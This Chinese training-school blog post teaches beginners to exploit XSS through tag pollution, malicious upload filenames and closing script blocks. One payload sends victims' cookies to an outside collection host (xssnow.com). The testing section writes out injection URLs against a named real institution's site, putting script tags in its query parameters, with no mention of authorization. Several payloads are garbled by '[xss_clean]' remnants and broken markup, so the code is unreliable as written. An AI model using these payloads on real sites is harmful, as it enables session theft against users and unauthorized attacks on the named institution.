热门课程

免费试听

上课方式

开班时间

当前位置: 首页 -   文章 -   根域文章 -   正文

零基础入门网络安全要想玩转XSS漏洞,这三个技巧你必须掌握

zhiliaoadmin
2022-08-09 16:34:02
0

零基础入门网络安全,要想玩转XSS漏洞这三个技巧你必须掌握。

 

XSS漏洞是一种网站应用程序的安全漏洞攻击,是代码注入的一种具有获取用户的Cookie修改页面信息.浏览器劫持等等危害,

 

XSS漏洞客户端脚本安全的头号大敌。今天知了堂教大家三个利用XSS漏洞的一些小技巧,希望对大家学习网络安全有所帮助。

 

技巧一:污染标签

简单的说,XSS漏洞的本质就是输入与输出。

比如,QQ网名是:"你的网名">

 

结果就被污染成:<input value="">

 

{xunruicms_img_title} 

这样就成功弹窗了,但又有什么用呢?

可以构造语句:

<input value=""#ff0000">http://xssnow.com/dZJ4?"
这样就能成功打到cookie了。

{xunruicms_img_title} 

 

技巧二:文件名称XSS

有些网站有上传点,但是后台并未对文件名做更改。比如上传以后前端代码是这样的:<a href="http://127.0.0.1/upload/1.rar">test</a>

 

rar假设就是我们上传的文件。

{xunruicms_img_title} 

是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)

 

改成:"><script>alert(1)</script>.rar这样的话,就变成:

{xunruicms_img_title} 

成功弹窗,如果过滤了尖括号 < >

就可以按照之前讲的标签污染法,让它执行JS语句。

 

技巧三:闭合JS

有时候,JS会调用网站的一些资料,类似昵称。

{xunruicms_img_title} 

因为昵称是被包含在<head>里,无法利用。这样就需要为它打开一个新大门。</script></head><body><img src=x onerror=alert(1)>这样就成功弹窗。

 

{xunruicms_img_title} 

 

分享一下测试XSS漏洞的方法,希望对零基础入门网络安全的你有用

 

1有输入框的页面测试

1)输入特殊字符 “ 、‘ 、> < 查看源代码(对非富文本非常有效)
2)为了更直观判断加入 <script>alert‘123’</script>
3)与其他标记结合如:
       img src="javascript:alert(/XSS/)"
       table background="javascript:alert(/XSS/)"></table

 

2、用户的请求链接中的数据测试。

(1)可以通过QueryString(放在URL)Cookie发送给服务器。

例如:在地址栏中输入:

alert([xss_clean])[xss_clean]">http://jwgl.sdxlxy.com/E_Board_News.asp?ID=<script>alert([xss_clean])</script>


2http://jwgl.sdxlxy.com/E_Board_News.asp?ID=45,在链接中?后面的ID=45,表示参数45代表他的值,把参数45替换掉或在45后面加上script脚本;


(3)当有多个参数的时候用&符号隔开如:

http://jwgl.sdxlxy.com/E_BigClass.asp?E_typeid=23&E_BigClassID=39

每一个参数我们都可以当成是一个输入框进行测试:

alert('xss')[xss_clean]&E_BigClassID=39">http://jwgl.sdxlxy.com/E_BigClass.asp?E_typeid=23<script>alert('xss')</script>&E_BigClassID=39

 

 

 

零基础入门网络安全如何玩转XSS漏洞的三个技巧及测试方法,今天知了堂就为大家介绍到这里了,网络安全内容多入门相关比较难。知了堂为大家准备了完整的学习路线,已经在官网上发布,请自行获取。预约上门考察,可微信:ChillFun-Y


大家都在看

学计算机的毕业后可以找什么工作?网络安全行业成就...

2022-08-09 浏览次数:0

学java培训去哪里好?要培训几个月呀?

2022-08-09 浏览次数:0

网络安全工程师前景如何?现在转行还来得及吗?

2022-08-09 浏览次数:0

数字化是企业的必修课

2022-08-09 浏览次数:0

UI设计培训机构怎么选?有哪些雷区可以避免?

2022-08-09 浏览次数:0

网络攻防怎么入门?网络攻防是什么

2022-08-09 浏览次数:0
最新资讯
零基础入门网络安全要想玩转XS...   零基础入门网络安全,要想玩转XSS漏洞,这三个技巧你必须掌握。  XSS漏洞是一种网站应用程序的...
零基础入门网络安全必备知识   网络安全主要是维护网络安全,维护网络安全就首先得知道是谁在破环网络安全,这是零基础入门网络安全必...
零基础入门网络安全必备知识点介...   网络安全就是指网络系统中的数据受到保护不被破坏。而我们从事网络信息安全工作的安全工程师,主要工作...
在成都如何用3个月零基础入门网... 在成都如何用3个月零基础入门网络安全?快速入门的先学习深厚的基础是必不可少的,我们一步步来。